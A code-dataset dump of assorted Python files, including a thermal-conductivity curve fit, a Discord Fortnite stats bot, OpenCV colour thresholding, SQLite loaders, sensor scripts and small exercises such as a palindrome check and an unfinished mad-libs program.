np.log(120))#data['T_log'].max())\n\n T = np.exp(interp_df_log['x'])\n k = np.exp(interp_df_log['y'])\n k_max = k.max()\n k = k / k_max\n\n perc_25 = int(len(k)*0.25)\n perc_50 = int(len(k)*0.5)\n perc_75 = int(len(k)*0.75)\n\n def loss_k(*params):\n c1 = params[0][0]\n c2 = params[0][1]\n n = params[0][2]\n c3 = params[0][3]\n c4 = params[0][4]\n k_fit = f_k(T, c1, c2, n, c3, c4)\n\n return 1.5*MAE(k[:perc_25], k_fit[:perc_25])+\\\n 1.2*MAE(k[perc_25:perc_50], k_fit[perc_25:perc_50])+\\\n MAE(k[perc_50:perc_75], k_fit[perc_50:perc_75])+\\\n MAE(k[perc_75:], k_fit[perc_75:])\n\n params = minimize(loss_k, (0.5, 0.2, 1, 2, 15),\n method='SLSQP',\n tol=1e-10,\n options={'maxiter': 10000}\n )\n c1, c2, n, c3, c4 = tuple(params.x.tolist())\n return c1, c2, n, c3, c4, k_max\n\nif __name__ == \"__main__\":\n p = '/home/quantum/Documents/iltpe/Cu10Zn2Sb4S13.dat'\n p = '/home/quantum/Documents/iltpe/PMMA.dat'\n # p = '/home/quantum/Documents/iltpe/SiO2Damon1973.txt'\n data = open_file(p)\n T = data['T'].astype('float')\n c1, c2, n, c3, c4 = approximate(data)\n print('C1 {}, C2 {}, N {}, C3 {}, C4 {}'.format(c1, c2, n, c3, c4))\n\n k_fit = k1(T, c1, c2, n) + k2(T, c3, c4)\n\n plt.scatter(data['T'], data['k'], color='g')\n plt.plot(T, k_fit)\n plt.yscale('log')\n plt.xscale('log')","sub_path":"k_fit_all.py","file_name":"k_fit_all.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"561331869","text":"\"\"\"Helper files for pipeline fastqc steps.\n\n\"\"\"\n\nimport os\n\nfrom ccrngspy import utils\n\nlogger = utils.make_local_logger(\"RUM helper logging\", level=\"debug\", color=\"green\")\n\ndef make_rum_param_list(samples, config, params=None):\n \"\"\"Helper function to turn the sample file into a list of files.\n\n Needs to be a list of [[input1, input2], output, params]; for the fastqc script.\n\n The output is the file RUM.sam.\n\n while the params are taken from the global opts variable\n (and possibly from the YAML config file).\n \n \"\"\"\n\n final_list = []\n\n fastq_dir = config['general_params']['fastq_input_dir']\n log_dir = config['general_params']['log_file_dir']\n rum_dir = config['rum_params']['output_dir']\n\n \n for sample in samples:\n params = dict(sample=sample['samplename'])\n \n tmp = [[os.path.join(fastq_dir, sample['filename1']),\n os.path.join(fastq_dir, sample['filename2'])],\n os.path.join(rum_dir, sample['samplename'], \"RUM.sam\"),\n params]\n \n final_list.append(tmp)\n\n return final_list\n","sub_path":"ccrngspy/ccrngspy/pipeline/rum_helpers.py","file_name":"rum_helpers.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"107474260","text":"#https://www.hackerrank.com/challenges/game-of-thrones/submissions/code/13996049\r\nstring = raw_input()\r\ndistalph=list(set(list(string)))\r\ndict1={}\r\nfor char in distalph:\r\n cnt=0\r\n cnt=list(string).count(char)\r\n dict1[char]=cnt\r\nodds=0\r\nevens=0\r\nfor key in dict1:\r\n if dict1[key]%2==0:\r\n evens=evens+1\r\n else:\r\n odds=odds+1\r\n\r\nif odds>1:\r\n found = False\r\nelse:\r\n found = True\r\n# Write the code to find the required palindrome and then assign the variable 'found' a value of True or False\r\n\r\nif not found:\r\n print(\"NO\")\r\nelse:\r\n print(\"YES\")\r\n","sub_path":"GameofThronesI.py","file_name":"GameofThronesI.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"402557275","text":"#TerribleTicTacs-Dennis Chen && Britni Canale\r\n#SoftDev1 pd 6\r\n#K16: No Trouble\r\n#10/4/18\r\n\r\nimport sqlite3\r\nimport csv\r\n\r\n\r\n#========Initializing Files========\r\n\r\nDB_FILE=\"database.db\"\r\ndb = sqlite3.connect(DB_FILE)\r\nc = db.cursor() #allows sqlite to be used on database.db\r\n\r\n\r\n#==========Function for making a table from csv==========\r\n\r\ndef makeTable(filename):\r\n with open(filename, 'r') as csvfile: #opens database\r\n reader = csv.DictReader(csvfile) #creates sequence of dictionaries\r\n num = 0 #used to determine if row is first row\r\n col1 = \"\" #initializes column strings\r\n col2 = \"\"\r\n col3 = \"\"\r\n for row in reader: #goes through each row, adds to table\r\n if num == 0: #if row is first row, names columns based on csv file, uses list of keys to access header names\r\n col1 = list(row.keys())[0] \r\n col2 = list(row.keys())[1]\r\n col3 = list(row.keys())[2]\r\n c.execute(\"CREATE TABLE \" + filename[0:-4] + \"(\" +col1+ \" TEXT, \" + col2+ \" INTEGER, \" +col3+\" INTEGER)\") #creates table\r\n num = num + 1 #increments to indicate first row has been passed\r\n params = (row[col1],row[col2],row[col3]) #creates params for values using row dictionary and column names \r\n c.execute(\"INSERT INTO \" + filename[0:-4] + \" VALUES(?, ?, ?)\", params) #inserts values in each row into the table\r\n\r\n\r\n#==================Calling functions for file names used, saving changes=====================\r\n\r\n\r\nmakeTable(\"courses.csv\")\r\nmakeTable(\"peeps.csv\")\r\ndb.commit() #save changes\r\ndb.close() #close database\r\n","sub_path":"16_csv2db/TerribleTicTacs_ChenD_CanaleB.py","file_name":"TerribleTicTacs_ChenD_CanaleB.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"578223523","text":"import discord\nimport config\nfrom api import fortnite_api as api\nfrom discord.ext import commands\n\nclass Fortnite():\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(pass_context=True)\n async def stats(self, ctx, *args):\n \"\"\" Get fortnite stats via API \"\"\"\n gamertag = ' '.join(args)\n embed_lifetime = discord.Embed(colour = discord.Colour.blue())\n embed_current_season = discord.Embed(colour = discord.Colour.purple())\n\n try:\n lifetime_stats = api.get_lifetime_stats(gamertag)\n current_season_stats = api.get_current_season_stats(gamertag)\n except:\n if not gamertag:\n await self.bot.say('Skriv `.stats [gamertag]` for å se oversikt.')\n else:\n await self.bot.say(f'Finner ingen profil med gamertaggen `{gamertag}`')\n return\n\n for title, stat in lifetime_stats.items():\n embed_lifetime.add_field(name=title, value=stat, inline=True)\n\n for title, stat in current_season_stats.items():\n embed_current_season.add_field(name=title, value=stat, inline=True)\n \n await self.bot.say(f'Her er en total oversikt over `{gamertag}` siden Season 1:', embed=embed_lifetime)\n await self.bot.say(f'Her er en oversikt over `{gamertag}` for Season {config.current_season}:', embed=embed_current_season)\n \n @commands.command()\n async def store(self):\n store = []\n rarity = {'Fine': 0xffa31a, 'Quality': 0xd11aff, 'Sturdy': 0x0066ff, 'Handmade': 0x00cc00}\n\n try:\n store = api.get_store()\n except:\n await self.bot.say('Klarte ikke hente shoppen. Prøv igjen senere.')\n return\n \n for item in store:\n e = discord.Embed(title=item['name'], description=f\"{item['vBucks']} vBucks\", colour=rarity[item['rarity']])\n e.set_thumbnail(url=item['imageUrl'])\n await self.bot.say(embed=e)\n\n\ndef setup(bot):\n bot.add_cog(Fortnite(bot))\n","sub_path":"fortnite.py","file_name":"fortnite.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"379882663","text":"# coding=utf-8\nimport cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('image')\ncv2.createTrackbar('hmin', 'image', 0, 255, nothing)\ncv2.createTrackbar('smin', 'image', 0, 255, nothing)\ncv2.createTrackbar('vmin', 'image', 0, 255, nothing)\ncv2.createTrackbar('hmax', 'image', 0, 180, nothing)\nswitch = '0:OFF\\n1:ON'\ncv2.createTrackbar(switch, 'image', 0, 1, nothing)\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n hmin = cv2.getTrackbarPos('hmin', 'image')\n smin = cv2.getTrackbarPos('smin', 'image')\n vmin = cv2.getTrackbarPos('vmin', 'image')\n hmax = cv2.getTrackbarPos('hmax', 'image')\n s = cv2.getTrackbarPos(switch, 'image')\n\n # 设定橙色的阈值\n lower_orange = np.array([hmin, smin, vmin])\n upper_orange = np.array([hmax, 255, 255])\n # 根据阈值构建掩模\n mask = cv2.inRange(hsv, lower_orange, upper_orange)\n\n # 对原图像和掩模进行位运算\n res = cv2.bitwise_and(frame, frame, mask=mask)\n # 显示图像\n cv2.imshow('frame', frame)\n cv2.imshow('mask', mask)\n cv2.imshow('res', res)\n\n # edges = cv2.Canny(img, minVal_1, maxVal_1)\n # cv2.imshow('edges', edges)\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break","sub_path":"past/patio2_test1_7_video_capture_color_hsv.py","file_name":"patio2_test1_7_video_capture_color_hsv.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524066789","text":"from numpy import *\nfrom numpy import matlib\nfrom tkinter import *\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom PIL import Image, ImageTk\nfrom scipy import misc\nfrom scipy.interpolate import interp2d\nimport skimage\n#from colormap import Colormap\nimport numpy as np\nplt.ion()\n\ndef get_background(size=(1000,1000)):\n\n size_x=size[0]\n size_y=size[1]\n size_turb_x=size[0]\n size_turb_y=size[1]\n lambdax = 8\n lambday = 400\n xpower = 400\n ypower = 500\n\n a=0\n l=0\n\n fig=plt.figure()\n\n while l<2 :\n mat0=random.rand(size_turb_x,size_turb_x)\n x0=arange(size_turb_x)\n y0=arange(size_turb_x)\n grids=[]\n pts=vstack((x0,y0))\n\n for j in arange(1,7,1) :\n i=2**j\n x1=arange(0,size_turb_x,i)\n y1=arange(0,size_turb_x,i)\n f = interp2d(x0, y0, mat0)\n grid_z1=f(x1,y1)\n grids.append(grid_z1)\n per=1\n perlin_mat=empty((size_turb_x,size_turb_x))\n\n for mat in grids :\n mat=skimage.transform.resize(mat,(size_turb_x,size_turb_x))\n per=per/0.7\n perlin_mat = perlin_mat + mat*per\n perlin_mat=perlin_mat/amax(perlin_mat)\n perlin_cut=perlin_mat.copy()\n l=l+1\n perlin_cut=skimage.transform.resize(perlin_cut,(size_y,size_x))\n perlin_cut=perlin_cut/amax(perlin_cut)\n\n if a == 0 :\n turb_x0=perlin_cut\n a=1\n else :\n turb_y0=perlin_cut\n\n x0=arange(size_x)\n y0=arange(size_y)\n X,Y=meshgrid(x0,y0)\n #mat0=np.sin(((X+turb_x0*xpower)/lambdax)*2*pi)\n mat0=(((X+turb_x0*xpower)/lambdax)*sin(((Y+turb_y0*ypower)/lambday)*2*pi))**2\n cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"gray\",\"black\"])\n\n im_plt = plt.imshow(mat0,cmap=cmap)\n image = Image.fromarray(np.uint8( im_plt.get_cmap()(im_plt.get_array())*255))\n im = ImageTk.PhotoImage('RGB', image.size)\n im.paste(image)\n plt.pause(60)\n# plt.close(fig)\n return im\n\n\nif __name__ == '__main__':\n\n im_plt = get_background()\n\n\n","sub_path":"PerlinNoiseGeneration/mountain/woodenbackground.py","file_name":"woodenbackground.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"176997497","text":"#!/usr/bin/env python\n#-*-encoding:utf-8-*-\n\n__author__ = 'shouke'\n\nfrom common.log import logger\n\n\nclass TestReport:\n def __init__(self, db):\n self.db = db\n\n def get_case_num_by_run_result(self, execution_num, plan_id, status):\n logger.info('正在查询运行状态为:%s的用例记录数' % status)\n query = \"SELECT COUNT(id) FROM `website_ui_test_report_for_case` WHERE run_result = '%s' and plan_id = %s AND execution_num =%s\"\n data = (status,plan_id, execution_num)\n result = self.db.select_one_record(query, data)\n if result[0] and result[1]:\n case_num = result[1][0]\n return case_num\n elif result[0] and not result[1]:\n logger.error('未查询到运行状态为:%s的用例' % status)\n return 0\n else:\n logger.error('查询状态为%s用例数出错:%s,退出程序' % result[1])\n exit(1)\n\n def insert_report_for_summary(self, data):\n insert_query = \"INSERT INTO `website_ui_test_report_for_summary`\" \\\n \"(execution_num, project_id, plan_id, project_name, plan_name, browser,\" \\\n \"start_time, end_time, time_took, case_total_num, case_pass_num, case_fail_num, case_block_num, remark) \" \\\n \"VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s)\"\n result = self.db.execute_insert(insert_query, data)\n if not result[0]:\n logger.error('往测试报告-测试概况插入运行记录失败:%s,提前退出程序' % result[1])\n exit(1)\n\n def update_report_for_summary(self, data):\n update_query = \"UPDATE `website_ui_test_report_for_summary` SET end_time='%s', time_took='%s', \" \\\n \"case_total_num=%s, case_pass_num=%s, case_fail_num=%s, case_block_num=%s, remark='%s' WHERE execution_num='%s' AND plan_id=%s\"\n result = self.db.execute_update(update_query, data)\n if not result[0]:\n logger.error('更新测试报告-测试概况表失败:%s,即将退出程序' % result[1])\n exit(1)\n\n def insert_report_for_case(self, data):\n insert_query = \"INSERT INTO `website_ui_test_report_for_case`\" \\\n \"(execution_num, plan_id, case_id, case_path, case_name, run_result, remark, run_time, time_took) \" \\\n \"VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n result = self.db.execute_insert(insert_query, data)\n if not result[0]:\n logger.error('往测试报告-测试用例执行明细表插入运行记录失败:%s,提前退出程序' % result[1])\n exit(1)\n\n\n def insert_report_for_case_step(self, data):\n insert_query = \"INSERT INTO `website_ui_test_report_for_case_step`(execution_num, plan_id, case_id, step_id, `order`, page, object, exec_operation, input_params, \" \\\n \"output_params, assert_type, check_pattern, run_times, try_for_failure, run_result, remark, run_time, run_id) \" \\\n \"VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n result = self.db.execute_insert(insert_query, data)\n if not result[0]:\n logger.error('往测试报告-测试用例步骤执行明细表插入运行记录失败:%s,提前退出程序' % result[1])\n exit(1)\n","sub_path":"UIAutotest/test_report.py","file_name":"test_report.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"148828046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nrain = pd.read_csv('/Users/rs/data/rain.csv')\n\nrain.rename(columns={'0': 'date', '1': 'rain'}, inplace=True)\nrain['date'] = pd.to_datetime(rain['date'])\n\nrain_2017 = rain[rain.date.dt.year == 2017]\n\nrain['year'] = rain.date.dt.year\nrain['month'] = rain.date.dt.month\n\ng1 = sns.relplot('month', 'rain', \n kind = 'line' , \n data = rain[rain.date.dt.year == 2017])\nplt.title('Daily rain (cm), 2017')\ng1 = g1.set_axis_labels('month', 'rain')\n\n\nsns.relplot('month', 'rain', kind = 'line', hue = 'year', legend = False, data = rain)\nplt.title('Unreadable, but pretty graph of rain (cm) by year')\nplt.legend(['2000', '2001', '2002', '2003', '2004', '2005', '2006', \n '2007', '2008', '2009', '2010', '2011', '2012', '2013', \n '2014', '2015', '2016', '2017', '2018'], bbox_to_anchor=(1.05, 1), loc=2)\n\nsns.relplot('month', 'rain', kind = 'line', row = 'year', data = rain)\nplt.title('Daily rain (cm) by year')\n\nsns.relplot('month', 'rain', kind = 'line', col = 'year', col_wrap = 3, data = rain)\nplt.suptitle('Daily rain (cm) by year')\nplt.xlabel('month')\n","sub_path":"Code/Richard/python/rain-data-seaborn-graphs.py","file_name":"rain-data-seaborn-graphs.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"312515286","text":"# -*- coding: utf-8 -*-\n\"\"\"Unit test suite for the models of the application.\"\"\"\n\nimport json\n\nfrom nose.tools import assert_equals, eq_\nfrom sqlalchemy import create_engine\n\nfrom bodhi.models import DBSession, Base\n\n\nclass ModelTest(object):\n \"\"\"Base unit test case for the models.\"\"\"\n\n klass = None\n attrs = {}\n\n def setup(self):\n engine = create_engine('sqlite://')\n DBSession.configure(bind=engine)\n Base.metadata.create_all(engine)\n try:\n new_attrs = {}\n new_attrs.update(self.attrs)\n new_attrs.update(self.do_get_dependencies())\n self.obj = self.klass(**new_attrs)\n DBSession.add(self.obj)\n DBSession.flush()\n return self.obj\n except:\n DBSession.rollback()\n raise\n\n def tearDown(self):\n DBSession.remove()\n\n def do_get_dependencies(self):\n \"\"\" Use this method to pull in other objects that need to be\n created for this object to be built properly.\n \"\"\"\n\n return {}\n\n def test_create_obj(self):\n pass\n\n def test_query_obj(self):\n for key, value in self.attrs.iteritems():\n assert_equals(getattr(self.obj, key), value)\n\n def test_json(self):\n \"\"\" Ensure our models can return valid JSON \"\"\"\n assert json.dumps(self.obj.__json__())\n\n def test_get(self):\n for col in self.obj.__get_by__:\n eq_(self.klass.get(getattr(self.obj, col), DBSession), self.obj)\n","sub_path":"bodhi/tests/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"622907592","text":"# class Solution(object):\ndef twoSum(nums, target): # self,\n if len(nums) <= 1:\n return False\n buff_dict = {}\n for i in range(len(nums)):\n if nums[i] in buff_dict:\n return [buff_dict[nums[i]], i]\n else:\n buff_dict[target - nums[i]] = i\n\n\nif __name__ == '__main__':\n nums = [2,3,4,5,7,10,34,56,17]\n target = [7,9,17,37,50]\n print(nums)\n for t in target:\n result = twoSum(nums, t)\n if result:\n print(t, result, '=', nums[result[0]], '+', nums[result[1]])\n else:\n print(t, ' not in ', nums)\n \n","sub_path":"test-twosums.py","file_name":"test-twosums.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"427383963","text":"import ConfigParser\nimport RPi.GPIO as GPIO\nimport time\nimport Adafruit_DHT\n\n# GPIO Mode (BOARD / BCM) BCM e il numero dopo \"GPIO\nGPIO.setmode(GPIO.BCM)\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('nasProperties.properties')\n\n# set GPIO Pins\ngpio_trigger = int(config.get('raspberryPi', 'hcsr04_1_trigger'))\ngpio_echo = int(config.get('raspberryPi', 'hcsr04_1_echo'))\ngpio_dht22 = config.get('raspberryPi', 'dht22Pin')\n\n\n# set GPIO direction (IN / OUT)\nGPIO.setup(gpio_trigger, GPIO.OUT)\nGPIO.setup(gpio_echo, GPIO.IN)\n\n\ndef distance():\n # set Trigger to HIGH\n GPIO.output(gpio_trigger, True)\n\n # set Trigger after 0.01ms to LOW\n time.sleep(0.00001)\n GPIO.output(gpio_trigger, False)\n\n StartTime = time.time()\n StopTime = time.time()\n\n # save StartTime\n while GPIO.input(gpio_echo) == 0:\n StartTime = time.time()\n\n # save time of arrival\n while GPIO.input(gpio_echo) == 1:\n StopTime = time.time()\n\n # time difference between start and arrival\n TimeElapsed = StopTime - StartTime\n # multiply with the sonic speed (34300 cm/s)\n # and divide by 2, because there and back\n soundspeed = getSonicSpeed()\n distance = (TimeElapsed * soundspeed) / 2\n\n return distance\n\n\ndef getSonicSpeed():\n humidity, temperature = Adafruit_DHT.read_retry(22, gpio_dht22)\n soundspeed = (331.4 + (0.606 * temperature) + (0.0124 * humidity))*100\n\n print(\"temp: \"+str(temperature)+\" hum \"+str(humidity)+\" sound speed: \"+str(soundspeed) + \" cm/s\")\n return soundspeed\n\nif __name__ == '__main__':\n try:\n while True:\n dist = distance()\n print (\"Measured Distance = %.1f cm\" % dist)\n time.sleep(5)\n\n # Reset by pressing CTRL + C\n except KeyboardInterrupt:\n print(\"Measurement stopped by User\")\n GPIO.cleanup()","sub_path":"ultrasonicDistanceWithTempAndHum.py","file_name":"ultrasonicDistanceWithTempAndHum.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"378521840","text":"\n\nimport pandas as pd\nimport numpy as np\nfrom myTools.pdTools.auto_ml_tool.amt_2_3 import Amtl\n\ndata_path = 'train.csv'\ntrain_data = pd.read_csv('train.csv', encoding='ISO-8859-1', low_memory=False)\n\nlist_org = ['Id', 'MSSubClass', 'MSZoning', 'SalePrice']\n#list_org = ['PassengerId', 'Survived', 'Pclass', \"Age\", \"SibSp\", \"Fare\", \"Cabin\"]\none_hot_list =[\"City\"]\n\n\n#n_estimators默认100,max_depth默认3,min_child_weight默认1,gamma默认0,learning_rate默认0.1\ncv_param = {\n 'n_estimators': np.arange(20, 80, 5),\n 'max_depth': np.arange(2, 5, 1),\n 'min_child_weight': np.arange(1, 2, 1),\n 'gamma': np.arange(0.1, 0.2, 0.05),\n 'learning_rate': np.arange(0.1, 0.2, 0.05)\n }\n\npsl = Amtl(train_data, 'Id', 'SalePrice', model='R', fearture_list=None, one_hot_list='off',\n pca_param_s=0.9, pca_param_d=0.9)\npsl.fit()","sub_path":"r_demo/xgb_train.py","file_name":"xgb_train.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"460001234","text":"import copy\nfrom typing import List\nfrom dae.pedigrees.family import FamiliesData, Family\n\n\nclass FamiliesTsvSerializer:\n \"\"\"Class for serializing families into TSV format.\"\"\"\n\n def __init__(self, families: FamiliesData):\n self._families = families\n\n def serialize(self, sep=\"\\t\", columns=None) -> List[str]:\n \"\"\"Serialize families to list of lines with a header.\"\"\"\n if columns is None:\n columns = list(self._families.values())[0].get_columns()\n rows = [f\"{sep.join(columns)}\\n\"]\n for family in self._families.values():\n rows.extend(\n self._serialize_family(family, sep=sep, columns=columns)\n )\n return rows\n\n @staticmethod\n def _serialize_family(family: Family, sep=\"\\t\", columns=None) -> List[str]:\n \"\"\"Serialize family to a list of lines per member.\"\"\"\n if columns is None:\n columns = family.get_columns()\n rows = []\n for member in family.full_members:\n # pylint: disable=protected-access\n record = copy.deepcopy(member._attributes)\n record[\"mom_id\"] = member.mom_id if member.mom_id else \"0\"\n record[\"dad_id\"] = member.dad_id if member.dad_id else \"0\"\n record[\"generated\"] = member.generated \\\n if member.generated else False\n record[\"not_sequenced\"] = member.not_sequenced \\\n if member.not_sequenced else False\n row = []\n for col in columns:\n row.append(str(record[col]))\n rows.append(f\"{sep.join(row)}\\n\")\n return rows\n","sub_path":"dae/dae/pedigrees/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"314042480","text":"import bpy\r\nimport os\r\nfrom . import preset_setup\r\ndef lomo():\r\n preset_setup.preset_setup(preset_name=\"Lomo Enrich\", blend_name=\"Enrich.blend\")\r\n enrich_props = bpy.context.scene.enrich_props\r\n vig = bpy.context.scene.node_tree.nodes['Vignette_E']\r\n vig.inputs[2].default_value = 80\r\n enrich_props.vig_opacity=80\r\n\r\n vig_blur = vig.node_tree.nodes[\"Blur\"]\r\n vig_blur.factor_x = 20\r\n vig_blur.factor_y = 20\r\n vig_blur.inputs[1].default_value = 0.9\r\n\r\n vig_mask = vig.node_tree.nodes[\"Ellipse Mask\"]\r\n vig_mask.y = 0.5\r\n vig_mask.x = 0.5\r\n enrich_props.vig_location_y = 0.5\r\n enrich_props.vig_location_x = 0.5\r\n vig_mask.width = 0.866\r\n vig_mask.height = 0.465\r\n vig_mask.inputs[1].default_value = 1.0\r\n","sub_path":"All_In_One/addons/Enrich_Presets/lomo.py","file_name":"lomo.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"8757131","text":"#!/usr/bin/env python\r\n#\r\n# sdr_script - Common User Interface classes - input level\r\n# \r\n# User: bob\r\n# Date: 29/05/16\r\n# Copyright (C) 2013 by G3UKB Bob Cowdery\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n# \r\n# The author can be reached by email at: \r\n# bob@bobcowdery.plus.com\r\n#\r\n\r\n# System imports\r\nimport os,sys\r\nfrom PyQt4 import QtCore, QtGui\r\n\r\n# Application imports\r\nfrom common.defs import *\r\n\r\n\"\"\"\r\n\r\nMain class for input level indication under VOX control\r\n\r\n\"\"\"\r\nclass Level(QtGui.QWidget):\r\n \r\n def __init__(self, w, max_level, trigger_level):\r\n \"\"\"\r\n Constructor\r\n \r\n Arguments:\r\n max_level -- maximum input level\r\n trigger_level -- the level at which VOX will trigger\r\n \r\n \"\"\"\r\n \r\n super(Level, self).__init__(w)\r\n \r\n # Instance params\r\n self.__max_level = max_level\r\n \r\n # Drawing implements\r\n self.__font = QtGui.QFont('Times', 8)\r\n self.__trigger_pen = QtGui.QPen(QtGui.QColor(75,150,113))\r\n self.__level_pen = QtGui.QPen(QtGui.QColor(182,28,5))\r\n self.__level_pen.setWidth(4)\r\n \r\n # Drawing metrics\r\n self.__span = 235\r\n self.__trigger_st_x = 10\r\n self.__trigger_end_x = 245\r\n self.__level_st_x = 10\r\n self.__level_end_x = 10\r\n self.__trigger_y = 5\r\n self.__level_y = 14 \r\n self.__level_per_pixel = float(self.__span)/ float(self.__max_level) \r\n self.__trigger_level = int(trigger_level * L_MAX_TX_AUDIO_IN/100 * self.__level_per_pixel)\r\n self.__trigger_px = self.__level_per_pixel * self.__trigger_level\r\n \r\n def paintEvent(self, e):\r\n \"\"\"\r\n Render the control\r\n \r\n Arguments:\r\n e -- event\r\n \r\n \"\"\"\r\n \r\n # Start painting]\r\n qp = QtGui.QPainter()\r\n qp.begin(self)\r\n \r\n # Paint a bar with the trigger indicator\r\n qp.setPen(self.__trigger_pen)\r\n qp.drawLine(self.__trigger_st_x, self.__trigger_y, self.__trigger_end_x, self.__trigger_y)\r\n qp.drawLine(self.__trigger_st_x + self.__trigger_level, self.__trigger_y - 5, self.__trigger_st_x + self.__trigger_level, self.__trigger_y + 5)\r\n # Paint the level indicator\r\n qp.setPen(self.__level_pen)\r\n qp.drawLine(self.__level_st_x, self.__level_y, self.__level_end_x, self.__level_y)\r\n # End painting\r\n qp.end()\r\n \r\n def update_level(self, level):\r\n \"\"\"\r\n Update the level\r\n \r\n Arguments:\r\n level -- level as raw 16 bit value\r\n \r\n \"\"\"\r\n \r\n self.__level_end_x = int((level * self.__level_per_pixel) + self.__level_st_x)\r\n self.update()\r\n \r\n def update_trigger(self, trigger_level):\r\n \"\"\"\r\n Update the trigger level\r\n \r\n Arguments:\r\n trigger_level -- trigger level as 16 bit value\r\n \r\n \"\"\"\r\n \r\n self.__trigger_level = int(trigger_level * L_MAX_TX_AUDIO_IN/100 * self.__level_per_pixel)\r\n 
self.update()\r\n","sub_path":"SdrScript/python/ui/common/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"365399551","text":"#! python 3\r\n# madLibs.py\r\nimport os, re\r\n\r\n# Open file\r\ntextFile = open(r'C:\\Users\\Mack W\\Documents\\7 Python\\pyFiles\\Automate the Boring Stuff with Python\\Chapter 8 Files\\Practice Projects\\madLibsPrompt.txt')\r\n\r\n# Find ADJECTIVE, NOUN, ADVERB, and VERB in the file\r\ngrammar = re.compile(r'ADJECTIVE|NOUN|ADVERB|VERB')\r\nmatchObject = grammar.findall(textFile.read())\r\n\r\n# Prompt user to replace them\r\nfor i in range(len(matchObject)):\r\n if matchObject[i] == 'ADJECTIVE':\r\n print('Enter an adjective: ', end = '')\r\n adjective += [input()] \r\n elif matchObject[i] == 'NOUN':\r\n print('Enter a noun: ', end = '')\r\n noun += [input()]\r\n elif matchObject[i] == 'ADVERB':\r\n print('Enter an adverb: ', end = '')\r\n adverb += [input()]\r\n elif matchObject[i] == 'VERB':\r\n print('Enter a verb: ', end = '')\r\n verb += [input()]\r\n \r\nprint(adjective)\r\nprint(noun)\r\nprint(verb)\r\n\r\n# Create text file with replacements\r\n\r\n# Always close your files :)\r\ntextFile.close()\r\n","sub_path":"Chapter 8 Files/Practice Projects/madLibs.py","file_name":"madLibs.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
